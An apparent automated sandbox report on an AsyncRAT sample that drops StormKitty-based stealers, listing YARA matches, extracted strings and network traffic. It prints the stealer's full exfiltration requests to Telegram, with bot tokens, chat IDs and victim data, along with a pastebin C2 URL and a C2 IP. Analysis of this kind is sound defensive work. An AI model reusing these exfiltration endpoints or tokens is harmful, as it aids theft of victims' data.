Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
Source: Yara match, File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED
Source: global traffic, TCP traffic: 192.168.2.4:49739 -> 94.232.249.111:7707
Source: global traffic, HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:30%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
Source: global traffic, HTTP traffic detected: GET /geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15 HTTP/1.1 Host: api.mylnikov.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%0A%20%20%F0%9F%8C%AA%20*WorldWind%20Pro%20-%20Results:*%0ADate:%202024-06-28%205:19:44%20am%0ASystem:%20Windows%2010%20Pro%20(64%20Bit)%0AUsername:%20user%0ACompName:%20888683%0ALanguage:%20%F0%9F%87%A8%F0%9F%87%AD%20en-CH%0AAntivirus:%20Windows%20Defender.%0A%0A%20%20%F0%9F%92%BB%20*Hardware:*%0ACPU:%20Intel(R)%20Core(TM)2%20CPU%206600%20@%202.40%20GHz%0AGPU:%20KV_WO1B1%0ARAM:%204095MB%0AHWID:%20E63C35380D%0APower:%20NoSystemBattery%20(1%25)%0AScreen:%201280x1024%0A%0A%20%20%F0%9F%93%A1%20*Network:*%20%0AGateway%20IP:%20192.168.2.1%0AInternal%20IP:%20No%20network%20adapters%20with%20an%20IPv4%20address%20in%20the%20system!%0AExternal%20IP:%208.46.123.33%0ABSSID:%2000:50:56:a7:21:15%0A%0A%20%20%F0%9F%92%B8%20*Domains%20info:*%0A%20%20%20%E2%88%9F%20%F0%9F%8F%A6%20*Bank%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%92%B0%20*Crypto%20Logs*%20(No%20data)%0A%20%20%20%E2%88%9F%20%F0%9F%8D%93%20*Freaky%20Logs*%20(No%20data)%0A%0A%20%20%F0%9F%8C%90%20*Logs:*%0A%20%20%20%E2%88%9F%20%E2%8F%B3%20History:%209%0A%20%20%20%E2%88%9F%20%F0%9F%94%96%20Bookmarks:%205%0A%0A%20%20%F0%9F%97%83%20*Software:*%0A%0A%20%20%F0%9F%A7%AD%20*Device:*%0A%20%20%20%E2%88%9F%20%F0%9F%97%9D%20Windows%20product%20key%0A%20%20%20%E2%88%9F%20%F0%9F%8C%83%20Desktop%20screenshot%0A%0A%20%20%F0%9F%93%84%20*File%20Grabber:*%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Database%20files:%206%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Documents:%2045%0A%20%20%20%E2%88%9F%20%F0%9F%93%82%20Images:%2030%0A%0A%20Telegram%20Channel:%20@X_Splinter&parse_mode=Markdown&disable_web_page_preview=True HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
Source: global traffic, HTTP traffic detected: GET /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=5795480469&text=%F0%9F%93%81%20Uploading%20Log%20Folders... HTTP/1.1 Host: api.telegram.org
                    Source: global trafficHTTP traffic detected: POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 HTTP/1.1Content-Type: multipart/form-data; boundary="41deac85-9fb9-4f5f-9506-a40f6f02b564"Host: api.telegram.orgContent-Length: 152152Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET /raw/7B75u64B HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283662956 HTTP/1.1Content-Type: multipart/form-data; boundary="10e946af-e98d-41dd-8591-bd5457d5eee6"Host: api.telegram.orgContent-Length: 152152Expect: 100-continue
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: icanhazip.comConnection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 104.21.44.66
                    Source: Joe Sandbox View | IP Address: 149.154.167.220
                    Source: Joe Sandbox View | IP Address: 104.20.4.235
                    Source: Joe Sandbox View | ASN Name: TELEGRAMRU
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View | ASN Name: INT-PDN-STE-ASSTEPDNInternalASSY
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknown | DNS query: name: icanhazip.com
                    Source: unknown | TCP traffic detected without corresponding DNS query: 94.232.249.111
                    Source: global traffic | DNS traffic detected: DNS query: 206.23.85.13.in-addr.arpa
                    Source: global traffic | DNS traffic detected: DNS query: 107.143.13.0.in-addr.arpa
                    Source: global traffic | DNS traffic detected: DNS query: icanhazip.com
                    Source: global traffic | DNS traffic detected: DNS query: api.mylnikov.org
                    Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
                    Source: global traffic | DNS traffic detected: DNS query: pastebin.com
                    Source: unknown | HTTP traffic detected: POST /bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795480469 HTTP/1.1 | Content-Type: multipart/form-data; boundary="41deac85-9fb9-4f5f-9506-a40f6f02b564" | Host: api.telegram.org | Content-Length: 152152 | Expect: 100-continue
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.mylnikov.org
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032A5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.mylnikov.orgd
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.orgd
                    Source: svchost.exe, 00000007.00000002.2917460428.0000000001452000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                    Source: svchost.exe, 00000007.00000002.2930957797.0000000005BCE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.com/t
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://icanhazip.comd
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.comd
                    Source: zrrHgsDzgS.exe, 00000000.00000002.1725732577.0000000002A8D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A2B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.mylnikov.org
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A58000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15
                    Source: udwnme.exe, 0000000F.00000002.2919317603.000000000323E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.mylnikov.org/geolocation/wifi?v=1.1&bssid=00:50:56:a7:21:15d
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.tele
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
                    Source: luglzv.exe.7.dr | String found in binary or memory: https://api.telegram.org/bot
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B62000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot5390757788:AAFV65Ydun9OP40g78XxI5eDbV42KqHY5mU/sendDocument?chat_id=5283
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendDocument?chat_id=5795
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002A85000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot6766280506:AAHjuzaB1sSnpQb9lxJpGx01sFybzgTuJ7U/sendMessage?chat_id=57954
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot7379351260:AAGqtKlpHd72GFMRON17QY1OA6l1sR7mBik/sendMessage?chat_id=57954
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | String found in binary or memory: https://api.telegram.org/file/bot
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgD
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003343000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000002.2919317603.00000000032C3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.orgd
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | String found in binary or memory: https://github.com/LimerBoy/StormKitty
                    Source: udwnme.exe, 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002A16000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/LimerBoy/StormKitty0&nq
                    Source: udwnme.exe, 0000000F.00000002.2919317603.00000000036BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/LimerBoy/StormKittyTCfq$
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002ADE000.00000004.00000800.00020000.00000000.sdmp, luglzv.exe, 0000001C.00000002.2919353202.0000000002FCD000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | String found in binary or memory: https://pastebin.com/raw/7B75u64B
                    Source: luglzv.exe, 0000001C.00000002.2919353202.0000000002B2E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/7B75u64Bd
                    Source: svchost.exe, 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, udwnme.exe, 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, udwnme.exe.7.dr, luglzv.exe.7.dr | String found in binary or memory: https://raw.githubusercontent.com/LimerBoy/StormKitty/master/StormKitty/stub/packages/DotNetZip.1.13
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://support.mozilla.org
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                    Source: History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.dr | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                    Source: tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr | String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                    Source: History.txt0.15.dr, tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr, History.txt0.28.dr | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                    Source: tmp763D.tmp.dat.15.dr, tmp762D.tmp.dat.15.dr, tmpAD0B.tmp.dat.28.dr, tmpAD1C.tmp.dat.28.dr | String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://www.ecosia.org/newtab/
                    Source: tmpACEA.tmp.dat.28.dr, tmp760B.tmp.dat.15.dr, tmpAD2D.tmp.dat.28.dr, tmp763E.tmp.dat.15.dr | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://www.mozilla.org
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                    Source: History.txt.28.dr, History.txt.15.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/)
                    Source: udwnme.exe, 0000000F.00000002.2929858081.0000000004029000.00000004.00000800.00020000.00000000.sdmp, places.raw.15.dr, tmp778C.tmp.dat.15.dr, tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                    Source: tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                    Source: udwnme.exe, 0000000F.00000002.2929858081.0000000004029000.00000004.00000800.00020000.00000000.sdmp, places.raw.15.dr, tmp778C.tmp.dat.15.dr, tmpAE3C.tmp.dat.28.dr | String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                    Source: unknown | Network traffic detected: HTTP traffic on port 64798 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64799 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64790
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64792
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64791
                    Source: unknown | Network traffic detected: HTTP traffic on port 64796 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64797 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64802
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64801
                    Source: unknown | Network traffic detected: HTTP traffic on port 64790 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64801 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64792 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64802 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 64791 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64796
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64798
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64797
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 64799
                    Source: unknown | HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64790 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64791 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.21.44.66:443 -> 192.168.2.4:64796 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:64797 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:64801 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: Yara match | File source: zrrHgsDzgS.exe, type: SAMPLE
                    Source: Yara match | File source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svchost.exe.432d108.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svchost.exe.42d10e8.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 7.2.svchost.exe.432d108.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0000000F.00000000.1993724096.0000000000AD2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2925983885.00000000042A7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000000.1674883989.0000000000662000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.1725732577.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2919350933.00000000032A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000F.00000002.2919317603.0000000003001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000007.00000002.2919350933.000000000352D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: zrrHgsDzgS.exe PID: 6452, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7060, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: udwnme.exe PID: 4884, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: luglzv.exe PID: 5052, type: MEMORYSTR
                    Source: Yara match | File source: C:\Users\user\AppData\Roaming\svchost.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\udwnme.exe, type: DROPPED
                    Source: Yara match | File source: C:\Users\user\AppData\Local\Temp\luglzv.exe, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\NWTVCDUMOB.jpg
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\VLZDGUKUTZ\KATAXZVCPS.xlsx
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.jpg
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\ONBQCLYSPU\KATAXZVCPS.jpg
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exe | File deleted: C:\Users\user\AppData\Local\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\UMMBDNEQBN.pdf
                    Note: every deleted path sits under the stealer's own staging directory (...\a6951299a1e0d1ba1371dbc36b7a92d9\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\...), which mirrors the victim's Desktop tree. These are the grabber's staged copies of the Desktop documents, not the originals, so the "modifies existing user documents (likely ransomware)" heuristic is being triggered by the stealer removing its own collection folder rather than by encryption or destruction of user data.

                    System Summary

                    barindex
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: zrrHgsDzgS.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: dump.pcap, type: PCAPMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.0.zrrHgsDzgS.exe.660000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Asyncrat_11a11ba1 Author: unknown
                    Source: 0.2.zrrHgsDzgS.exe.2a9bd04.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
                    Source: 15.0.udwnme.exe.ad0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
